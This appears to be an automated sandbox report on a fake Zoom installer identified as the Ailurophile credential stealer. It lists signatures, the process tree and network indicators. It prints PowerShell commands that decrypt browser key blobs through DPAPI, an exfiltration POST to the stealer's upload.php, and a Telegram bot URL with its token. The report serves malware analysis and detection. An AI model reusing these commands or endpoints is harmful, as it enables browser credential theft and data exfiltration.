Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name:ZoomInstaller.exe
Analysis ID:1544493
MD5:806a6ccce380785faa45512ce603c580
SHA1:78a2936e19f0474f80f73144564e9f24c4559859
SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags:exeuser-NDA0E
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ZoomInstaller.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\ZoomInstaller.exe" MD5: 806A6CCCE380785FAA45512CE603C580)
    • WMIC.exe (PID: 7328 cmdline: wmic path win32_videocontroller get caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7440 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7520 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7600 cmdline: wmic os get Version MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7684 cmdline: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7952 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8052 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4340 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: ZoomInstaller.exe PID: 7284JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    Sigma Signatures

    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZoomInstaller.exe", ParentImage: C:\Users\user\Desktop\ZoomInstaller.exe, ParentProcessId: 7284, ParentProcessName: ZoomInstaller.exe, ProcessCommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", ProcessId: 7684, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-29T14:03:31.221087+010020571041Domain Observed Used for C2 Detected192.168.2.449737188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-29T14:03:30.538215+010020571031Domain Observed Used for C2 Detected192.168.2.4654061.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.7% probability
    Machine Learning detection for sample
    Source: ZoomInstaller.exeJoe Sandbox ML: detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9BAB52AE CryptUnprotectData,15_2_00007FFD9BAB52AE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD52AE CryptUnprotectData,17_2_00007FFD9BAD52AE
    Source: ZoomInstaller.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.4:65406 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.4:49737 -> 188.114.97.3:443
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 104.26.9.59 104.26.9.59
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.myip.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
    Source: global trafficDNS traffic detected: DNS query: api.myip.com
    Source: global trafficDNS traffic detected: DNS query: manestvli.shop
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: unknownHTTP traffic detected: POST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f HTTP/1.1Host: manestvli.shopUser-Agent: Go-http-client/1.1Content-Length: 6347Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794aAccept-Encoding: gzip
    Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.drString found in binary or memory: https://ailurophilestealer.com
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ailurophilestealer.com/bot
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?C:
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
    Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
    Source: ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
    Source: ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DestroyEnvironmentBlockreflect.Value.Interfacereflect.Value.NumMethodRemoveFontMemResourceExGetLogicalDriveStringsWSHGetSpecialFolderPathWRegisterRawInputDevicestoo many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: GetSidSubAuthorityCountQueryServiceLockStatusWRegNotifyChangeKeyValueSetKernelObjectSecurityDeleteVolumeMountPointWGetActiveProcessorCountSetInformationJobObjectSetNamedPipeHandleStateSetProcessPriorityBoostNtSetInformationProcessGetFileVersionInfoSizeWinvalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingasn1: structure error: truncated tag or length942d6eb00e0cbfd901026890zip: writer closed twicejson: unsupported type: runtime: C malloc failedargument must be a FLOATPRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;application/octet-streamunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sRequest Entity Too Largehttp: nil Request.Headerexec: Stdout already settracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailablememstr_baf83cf5-4
    Source: ZoomInstaller.exeStatic PE information: Number of sections : 24 > 10
    Source: ZoomInstaller.exe, 00000000.00000000.1697687201.00007FF68496E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: ZoomInstaller.exeBinary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@28/27@3/3
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\AilurophileJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1Jump to behavior
    Source: ZoomInstaller.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
